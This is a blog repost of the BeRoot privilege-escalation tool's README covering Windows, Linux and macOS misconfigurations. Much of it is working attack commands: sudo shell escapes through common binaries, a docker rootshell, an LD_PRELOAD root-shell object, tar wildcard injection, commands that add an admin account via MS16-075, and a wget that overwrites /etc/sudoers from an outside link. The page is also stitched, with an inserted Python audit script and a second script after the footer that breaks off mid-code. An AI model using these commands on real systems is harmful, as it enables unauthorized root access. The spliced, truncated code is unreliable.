BeRoot- A Post Exploitation Tool To Check Common Misconfigurations For Windows Linux And Mac OS



A compiled version is available here.

It will be added to the pupy project as a post exploitation module (so it will be executed in memory without touching the disk).

Except for one method, this tool is only used to detect issues, not to exploit them. If something is found, templates can be used to exploit it. To use a template, just create a test.bat file located next to the service / DLL used; the template should execute it once called. Depending on the Redistributable Packages installed on the target host, these binaries may not work.


Check the Following:

  • BeRoot For Windows 
  • BeRoot For Linux

BeRoot For Windows To Check Common Windows Misconfigurations

Run it

|===================================================
|                                                                    |
|                    Windows Privilege Escalation                    |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|===================================================

usage: beRoot.exe [-h] [-l] [-w] [-c CMD]

Windows Privilege Escalation

optional arguments:
  -h, --help         show this help message and exit
  -l, --list         list all softwares installed (not run by default)
  -w, --write        write output
  -c CMD, --cmd CMD  cmd to execute for the webclient check (default: whoami)

All detection methods are described in the following document.

Path containing space without quotes

Consider the following file path:

C:\Program Files\Some Test\binary.exe

If the path contains spaces and is not quoted, Windows tries to locate and execute programs in the following order:
  • C:\Program.exe
  • C:\Program Files\Some.exe
  • C:\Program Files\Some Test\binary.exe

Following this example, if the "C:\" folder is writable, it would be possible to create a malicious executable called "Program.exe". If "binary.exe" runs with high privileges, it could be a good way to escalate our privileges.

Note: BeRoot performs these checks on every service path, scheduled task and startup key located in HKLM.

How to exploit: 

The vulnerable path runs as:

  • a service: create a malicious service (or compile the service template)
  • a classic executable: create your own executable.
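
The lookup order above can be audited from the defender's side. The following Python code is an added example, not part of BeRoot or of the original page: it lists the extra executables Windows would try for an unquoted service, scheduled task or startup command line, and produces the quoted value that removes the ambiguity. The entry names, the paths other than the page's own and the writable-directory list are constructed sample data, and it assumes the intended binary ends in .exe.

```python
import ntpath
import re

# End of the executable inside an unquoted command line: the first ".exe"
# followed by whitespace or end of string (assumption: the binary ends in .exe).
_EXE_END = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)


def split_image_path(image_path):
    """Return (executable, was_quoted) for a service ImagePath or Run key value."""
    value = image_path.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        return (value[1:end] if end != -1 else value[1:]), True
    match = _EXE_END.search(value)
    exe = value[:match.end()] if match else value.split(" ", 1)[0]
    return exe, False


def hijack_candidates(image_path):
    """Executables Windows tries before the intended one, in lookup order."""
    exe, quoted = split_image_path(image_path)
    if quoted or " " not in exe:
        return []
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def quoted_fix(image_path):
    """The same command line with the executable wrapped in double quotes."""
    value = image_path.strip()
    exe, quoted = split_image_path(value)
    return value if quoted else f'"{exe}"{value[len(exe):]}'


def _norm(directory):
    """Case-insensitive directory key without a trailing backslash."""
    return directory.lower().rstrip("\\")


def audit_image_paths(entries, writable_dirs):
    """entries: {name: command line}. Returns one finding per candidate path."""
    writable = {_norm(d) for d in writable_dirs}
    findings = []
    for name, image_path in entries.items():
        for candidate in hijack_candidates(image_path):
            findings.append({
                "entry": name,
                "candidate": candidate,
                # A real audit would check the directory ACL here.
                "dir_writable": _norm(ntpath.dirname(candidate)) in writable,
                "fix": quoted_fix(image_path),
            })
    return findings


# Constructed sample data (the first path is the page's example).
SAMPLE_ENTRIES = {
    "SomeTestSvc": r"C:\Program Files\Some Test\binary.exe",
    "QuotedSvc": r'"C:\Program Files\Vendor App\svc.exe" --run',
    "SvcHost": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "AgentTask": r"C:\Program Files\Vendor App\agent.exe /config C:\My Data\a.ini",
}
SAMPLE_WRITABLE = [r"C:\Program Files"]  # constructed: assume users can write here

if __name__ == "__main__":
    for f in audit_image_paths(SAMPLE_ENTRIES, SAMPLE_WRITABLE):
        state = "WRITABLE" if f["dir_writable"] else "not writable"
        print(f'{f["entry"]}: {f["candidate"]} ({state}); fix: {f["fix"]}')
```

Entries that are already quoted, or whose executable path contains no space, produce no findings.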

Writable directory

Consider the following file path:

C:\Program Files\Some Test\binary.exe

If the directory containing "binary.exe" ("C:\Program Files\Some Test") is writable and the binary runs with high privileges, it could be used to elevate our privileges.

Note: BeRoot performs these checks on every service path, scheduled task and startup key located in HKLM.

How to exploit:

  • The service is not running:
Replace the legitimate service with our own, then restart it or check how it is triggered (at reboot, when another process is started, etc.).

  • The service is running and cannot be stopped:
Most exploitation cases will be like this: check for DLL hijacking and try to restart the service using the previous techniques.

Writable directory on %PATH%

This technique affects the following Windows versions:

  • 6.0  => Windows Vista / Windows Server 2008
  • 6.1  => Windows 7 / Windows Server 2008 R2
  • 6.2  => Windows 8 / Windows Server 2012

On a classic Windows installation, when a binary loads a DLL, Windows tries to locate it using the following steps:

- Directory where the binary is located
- C:\Windows\System32
- C:\Windows\System
- C:\Windows\
- Current directory where the binary has been launched
- Directory present in %PATH% environment variable

If a directory on the %PATH% variable is writable, it would be possible to perform DLL hijacking attacks. The goal is then to find a service which loads a DLL that is not present in any of these paths. This is the case for the default "IKEEXT" service, which loads the nonexistent "wlbsctrl.dll".

How to exploit: 

Create a malicious DLL called "wlbsctrl.dll" (use the DLL template) and add it to the writable path listed in the %PATH% variable. Start the "IKEEXT" service. To start the IKEEXT service without high privileges, a technique described in the French magazine MISC 90 explains the following method:

Create a file as follows:

C:\Users\bob\Desktop>type test.txt
[IKEEXTPOC]
MEDIA=rastapi
Port=VPN2-0
Device=Wan Miniport (IKEv2)
DEVICE=vpn
PhoneNumber=127.0.0.1

Use the "rasdial" binary to start the "IKEEXT" service. Even if the connection fails, the service should have been started.

C:\Users\bob\Desktop>rasdial IKEEXTPOC test test /PHONEBOOK:test.txt

Or you can try using the Ikeext-Privesc PowerShell script.

MS16-075

For French users, I recommend the article in MISC 90, which explains in detail how it works.

This vulnerability was fixed by Microsoft with MS16-075; however, many servers are still vulnerable to this kind of attack. I was inspired by the C++ POC available here

Here is some explanation (not in detail):

  1. Start the Webclient service (used to connect to some shares) using some magic tricks (using its UUID)
  2. Start an HTTP server locally
  3. Find a service which will be used to trigger a SYSTEM NTLM hash.
  4. Enable file tracing on this service by modifying its registry key to point to our web server (\\127.0.0.1@port\tracing)
  5. Start this service
  6. Our HTTP server starts a negotiation to get the SYSTEM NTLM hash
  7. Use this hash with SMB to execute our custom payload (SMBrelayx has been modified to perform this action)
  8. Clean everything up (stop the service, clean the registry, etc.).

How to exploit: 

BeRoot performs this exploitation; change the "-c" option to execute a custom command on the vulnerable host.

beRoot.exe -c "net user Zapata LaLuchaSigue /add"
beRoot.exe -c "net localgroup Administrators Zapata /add"

AlwaysInstallElevated registry key

AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. To allow it, two registry entries have to be set to 1:

  • HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

How to exploit: 

Create a malicious MSI binary and execute it.

Unattended Install files

This file contains all the configuration settings that were set during the installation process, some of which can include the configuration of local accounts, including Administrator accounts. These files are available at the following paths:

C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\System32\Sysprep\unattend.xml 
C:\Windows\System32\Sysprep\Panther\unattend.xml


How to exploit: 

Open the unattend.xml file to check if passwords are present on it. Should looks like:


   
       
           
                RmFrZVBhc3N3MHJk
                false</PlainText></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; &#160; &#160; </Password></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; &#160; &#160; <Description>Local Administrator</Description></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; &#160; &#160; <DisplayName>Administrator</DisplayName></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; &#160; &#160; <Group>Administrators</Group></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; &#160; &#160; <Name>Administrator</Name></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; &#160; &#160; </LocalAccount></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">&#160; &#160; </LocalAccounts></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"></UserAccounts></span><br /><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span><br /><h3 style="text-align: left;"><span style="color: #073763;">Other possible misconfigurations</span></h3><h4 style="text-align: left;">Other tests are realized to check if it's possible to:</h4><ul style="text-align: left;"><li>Modify an existing service</li><li>Create a new service</li><li>Modify a startup key (on HKLM)</li><li>Modify directory where all scheduled tasks are stored: 
"C:\Windows\system32\Tasks"</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS36H1QKW3XMTF4m9yk0qpt1eD3Xvg3dbD_7m3InxCk-Dw5zoU8vz_DBThLm1YMgrr6e8EAWn4uzILgA1dE2ct2vNrX27vNTUZjAiyTSn7u2jz5UkHLqn6YARj0VEWNGPrDoFyqVIi36L3/s1600/BeRoot+Privilage+Escalation.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1200" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS36H1QKW3XMTF4m9yk0qpt1eD3Xvg3dbD_7m3InxCk-Dw5zoU8vz_DBThLm1YMgrr6e8EAWn4uzILgA1dE2ct2vNrX27vNTUZjAiyTSn7u2jz5UkHLqn6YARj0VEWNGPrDoFyqVIi36L3/s640/BeRoot+Privilage+Escalation.jpg" width="640" /></a></div><div><br /></div><br /><h2 style="text-align: left;"><span style="color: #073763;">BeRoot For Linux</span></h2><div><div>BeRoot is a post exploitation tool to check common misconfigurations on Linux and Mac OS to find a way to escalate our privilege.</div><div><br /></div><div>To understand privilege escalation on these systems, you should understand at least two main notions: LOLBins (this name has been given for Windows binaries but it should be correct to use it for Linux as well) and Wildcards.&#160;</div><div>This Readme explains all technics implemented by BeRoot to better understand how to exploit it.</div><div><br /></div><h3 style="text-align: left;"><span style="color: #073763;">LOLBins</span></h3><div>LOLBins could be used to gain root privilege on a system. 
These binaries allow a user to execute arbitrary code on the host, so imagine you could have access to one of them with sudo privilege (suid binary or if it's allowed on the sudoers file), you should be able to execute system command as root.</div><div><br /></div><div><b>Here is a list of well-known binaries:</b></div><div><ul style="text-align: left;"><li><b>awk</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo awk 'BEGIN {system("/bin/sh")}'</span></div><div><ul style="text-align: left;"><li><b>docker (if you can call docker, no need to run it with sudo)</b></li></ul><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p</span></div><div><ul style="text-align: left;"><li><b>find</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo find . 
-type d -exec sh -c id {} \;</span></div><div><ul style="text-align: left;"><li><b>file viewer</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">less: !bash</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">man: !bash or $ sudo man -P whoami man</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">more: !bash</span></div><div><ul style="text-align: left;"><li><b>file modifications (cannot be consider as LOLbins but useful for privilege escalation)</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cp: sudo cp -f your_file /etc/sudoers</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">mv: sudo mv -f your_file /etc/sudoers</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div><ul style="text-align: left;"><li><b>ftp / sftp</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">ftp> ! 
ls</span></div><div><ul style="text-align: left;"><li><b>git</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #7f6000; font-family: "courier new" , "courier" , monospace;">export PAGER=./runme.sh</span></div><div><span style="background-color: #f3f3f3; color: #7f6000; font-family: "courier new" , "courier" , monospace;">sudo git -p help</span></div><div><ul style="text-align: left;"><li><b>mount</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo mount -o bind /bin/bash /bin/mount</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo mount</span></div><div><ul style="text-align: left;"><li><b>nmap</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">echo "os.execute('/bin/sh')" > /tmp/script.nse</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo nmap --script=/tmp/script.nse</span></div><div><ul style="text-align: left;"><li><b>rsync</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">echo "whoami > /tmp/whoami" > /tmp/tmpfile</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo rsync&#160; -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null</span></div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cat whoami&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">root</span></div><div><ul style="text-align: left;"><li><b>scripting languages</b></li></ul></div><div><span style="background-color: 
#f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">lua: os.execute('/bin/sh')</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">perl: sudo&#160; perl -e 'exec "/bin/sh";'</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">python: sudo&#160; python -c 'import os;os.system("/bin/sh")'</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">ruby: sudo ruby -e 'exec "/bin/sh"'</span></div><div><ul style="text-align: left;"><li><b>tar</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">text editor</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">vi: sudo vi -c '!sh' or :!bash or :set shell=/bin/bash:shell or :shell</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">vim : sudo vim -c '!sh' or :!bash or :set shell=/bin/bash:shell or :shell</span></div><div><ul style="text-align: left;"><li><b>tcpdump</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">echo "whoami > /tmp/whoami" > /tmp/tmpfile</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br 
/></span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cat whoami&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">root</span></div><div><ul style="text-align: left;"><li><b>wget (overwrite system file - need a web server)</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo wget https://ift.tt/2LFRNxz -O /etc/sudoers</span></div><div><ul style="text-align: left;"><li><b>zip</b></li></ul></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">echo "/bin/sh" > /tmp/run.sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo zip z.zip * -T -TT /tmp/run.sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div><i>Note: If you have more binary example, do not hesitate to open an issue explaining the technic and I will add it on the list.</i></div><div><br /></div><div>Having sudo access on these binaries do not mean you could always manage to execute commands on the system. 
For example, using the mount binary with a limited user could give you the following well known error, if it's well configured:</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">mount: only root can use "--options" option</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><h3 style="text-align: left;"><span style="color: #073763;">Wildcards</span></h3><div>If you have never heard about Unix wildcards, I suggest you read this very well explained <a href="https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt" rel="nofollow" target="_blank">article</a>. Using wildcards could lead into code execution if this one is not well called.</div><div><br /></div><div>For our example, we want to get a shell ("sh") using the tar command to execute code on the server. As explained on the LOLBin section, we could get it doing:</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh</span></div><div><br /></div><div>We consider a test file which is used to realize an archive of all files present on the directory.</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">user@host:~$ cat test.sh&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">tar cf archive.tar *&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><b><br /></b></span></div><div><b>Here are the steps to exploit this bad configuration:</b></div><div><ul style="text-align: left;"><li>open nano (with no arguments)</li><li>write something in 
it</li></ul></div><div><b>save file using tar arguments as file names:</b></div><div><ul style="text-align: left;"><li>--checkpoint-action=exec=sh</li><li>--checkpoint=1</li></ul></div><div><b>Once created, this is what you will find:</b></div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">user@host:~$ ls -la&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">total 32</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-rw-r--r-- 1 user user&#160; &#160; &#160;5 Jan 12 10:34 --checkpoint-action=exec=sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-rw-r--r-- 1 user user&#160; &#160; &#160;3 Jan 12 10:33 --checkpoint=1</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 user user&#160; 4096 Jan 12 10:34 .</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 7 user user&#160; 4096 Jan 12 10:29 ..</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-rwxr-xr-x 1 user user&#160; &#160; 22 Jan 12 10:32 test.sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div>If this file is executed as root (from cron table, from sudoers, etc.), you should gain root access on the system.</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">user@host:~$ sudo ./test.sh&#160;</span></div><div><span style="background-color: #f3f3f3; color: #274e13; 
font-family: "courier new" , "courier" , monospace;">sh-4.3# id</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uid=0(root) gid=0(root) groups=0(root)</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div>So depending on which binary and how the wildcard are used, the exploitation can be done or not. So on our example, the exploitation would not work anymore if the file would be like this:</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">user@host:~$ cat test.sh</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">tar cf archive.tar *.txt</span></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span></div><div>Thus, using a tool to detect these misconfigurations is very difficult. A manually analyse should be done to check if it's a false positive or not.</div><div><br /></div><h3 style="text-align: left;"><span style="color: #073763;">Sensitive files</span></h3><div>Lots of file are run with high permissions on the system (e.g cron files, services, etc.). 
Here is an example of intersting directories and files:</div><div><ul style="text-align: left;"><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/init.d</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.d&#160;</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.daily</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.hourly</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.monthly</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.weekly</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/sudoers</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/exports</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/at.allow</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/at.deny</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/crontab</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.allow</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/cron.deny</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , 
"courier" , monospace;">/etc/anacrontab</span></li><li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/spool/cron/crontabs/root</span></li></ul></div><h3 style="text-align: left;"><span style="color: #073763;">Here are the tests done by BeRoot:</span></h3><div><ul style="text-align: left;"><li>checks if you have access with write permission on these files.</li><li>checks inside the file, to find other paths with write permissions.</li><li>checks for wildcards (this check could raise false positives, but could also get you useful information). Sometimes, you may need write permissions on a specific folder to create your malicious file (as explained on the wildcard section), this check is not done because it could be done by two many ways on the script and it's difficult to automate.</li></ul></div><h3 style="text-align: left;"><span style="color: #073763;">Suid binaries</span></h3><div>SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it. So if suid file is owned by root, you should execute it using root privilege.</div><div><br /></div><div>BeRoot prints all suid files because a manually analyse should be done on each binary. However, it realizes some actions:</div><div><ul style="text-align: left;"><li>checks if we have write permissions on these binary (why not ? 
:))</li><li>checks if a LOLBin is used as suid to be able to execute system commands using it (remember you could have suid LOLBin without beeing able to exectute commands - checks LOLBin section with the false positive example using mount).</li></ul>To analyse manually, checking for .so files loaded from a writable path should be a great idea (this check has not been implemented on BeRoot):</div><div><br /></div><div><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">strace [SUID_PATH] 2>&1 | grep -i -E "open|access|no such file"</span></div><h3 style="text-align: left;"><span style="color: #073763;">NFS Root Squashing</span></h3><div>If <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">no_root_squash</span> appears in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/exports</span>, privilege escalation may be done. More information can be found here.</div><h4 style="text-align: left;">Exploitation:</h4><div><ul style="text-align: left;"><li><span style="background-color: #f3f3f3; color: #274e13;">mkdir /tmp/nfsdir&#160; # create dir</span></li><li><span style="background-color: #f3f3f3; color: #274e13;">mount -t nfs 192.168.1.10:/shared /tmp/nfsdir # mount directory&#160;</span></li><li><span style="background-color: #f3f3f3; color: #274e13;">cd /tmp/nfsdir</span></li><li><span style="background-color: #f3f3f3; color: #274e13;">cp /bin/bash . # copy wanted shell&#160;</span></li><li><span style="background-color: #f3f3f3; color: #274e13;">chmod +s bash # set suid permission</span></li></ul></div><h3 style="text-align: left;"><span style="color: #073763;">LD_PRELOAD</span></h3><div>If LD_PRELOAD is explicitly defined on sudoers file, it could be used to elevate our privilege. 
For example:

Defaults        env_keep += LD_PRELOAD

Create a shared object:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* declares setuid() and setgid() */

void _init() {
    unsetenv("LD_PRELOAD");   /* keep child processes from loading the object again */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

Compile it:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

If you have a binary that you could launch with sudo and NOPASSWD, launch it with LD_PRELOAD pointing to your shared object:

sudo LD_PRELOAD=/tmp/shell.so find

Sudoers file

Most privilege escalations on Linux servers rely on bad sudo configurations. This configuration can be found in the /etc/sudoers file.
To better understand the BeRoot workflow, you should have an idea of how a sudoers line is composed.

Basic line pattern:

users  hosts = (run-as) tags: commands

Here is an example using aliases.

User_Alias ADMINS = admin, user, root
Cmnd_Alias ADMIN_CMDS = /sbin/service, /usr/sbin/iptables, python /tmp/file.py
ADMINS ALL = (ALL) NOPASSWD: ADMIN_CMDS

So the users "admin", "user" and "root" can execute "service", "iptables" and "file.py" without a password (thanks to NOPASSWD):

admin,user,root ALL = (ALL) NOPASSWD: /sbin/service, /usr/sbin/iptables, python /tmp/file.py

BeRoot analyses every rule. If a rule affects our user or our user's group, it will:

  • check if we have write permissions on all possible commands (in our example, it will test "service", "iptables", "python" and "/tmp/file.py")
  • check for LOLBins
  • check for LOLBins + wildcards
  • check if we can impersonate another user ("su" command)
  • check write permissions on sensitive files and SUID binaries for this user
  • repeat all these checks on the sudoers file using this new user

Download BeRoot: https://github.com/AlessandroZ/BeRoot/archive/master.zip

from Hackers Online Club (HOC) https://ift.tt/2Lhr924
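The alias expansion and rule review described in the sudoers section above can be reproduced for auditing your own configuration. The following is an added example, not BeRoot's code: the names `parse_sudoers`, `audit` and `WORLD_WRITABLE_DIRS` are hypothetical, the sample input is constructed from the lines shown on this page, and only a simplified subset of the sudoers grammar is handled (one alias per line, tags before commands, no escaped commas).

```python
import re

# Constructed sample built from the page's own lines (env_keep + alias example).
SAMPLE_SUDOERS = """\
Defaults        env_keep += LD_PRELOAD
User_Alias ADMINS = admin, user, root
Cmnd_Alias ADMIN_CMDS = /sbin/service, /usr/sbin/iptables, python /tmp/file.py
ADMINS ALL = (ALL) NOPASSWD: ADMIN_CMDS
"""

# Assumption: directories that are normally writable by every local user.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

ALIAS_RE = re.compile(r"^(User|Runas|Host|Cmnd)_Alias\s+(\w+)\s*=\s*(.+)$")
ENV_KEEP_RE = re.compile(r"env_keep\s*\+?=\s*(.+)$")
TAGS_RE = re.compile(r"^((?:[A-Z_]+\s*:\s*)+)")


def split_list(text):
    return [item.strip() for item in text.split(",") if item.strip()]


def expand(names, table, seen=()):
    """Replace alias names by their members, recursively."""
    out = []
    for name in names:
        if name in table and name not in seen:
            out += expand(table[name], table, seen + (name,))
        else:
            out.append(name)
    return out


def parse_sudoers(text):
    """Return (env_keep, rules) with user and command aliases expanded."""
    aliases = {"User": {}, "Runas": {}, "Host": {}, "Cmnd": {}}
    env_keep, raw_rules, rules = [], [], []
    for line in text.replace("\\\n", " ").splitlines():  # join continuations
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        alias = ALIAS_RE.match(line)
        if alias:
            aliases[alias.group(1)][alias.group(2)] = split_list(alias.group(3))
        elif line.startswith("Defaults"):
            kept = ENV_KEEP_RE.search(line)
            if kept:
                env_keep += kept.group(1).strip('"').split()
        elif "=" in line:
            raw_rules.append(line)
    for line in raw_rules:  # second pass: every alias is known by now
        left, right = line.split("=", 1)
        parts = left.rsplit(None, 1)
        if len(parts) != 2:
            continue
        runas = re.match(r"\s*\(([^)]*)\)", right)
        if runas:
            right = right[runas.end():]
        users = expand(split_list(parts[0]), aliases["User"])
        nopasswd = False
        for item in split_list(right):
            tags = TAGS_RE.match(item)
            if tags:  # a tag stays in force for the commands that follow
                names = re.findall(r"[A-Z_]+", tags.group(1))
                nopasswd = "NOPASSWD" in names or (nopasswd and "PASSWD" not in names)
                item = item[tags.end():].strip()
            for command in expand([item] if item else [], aliases["Cmnd"]):
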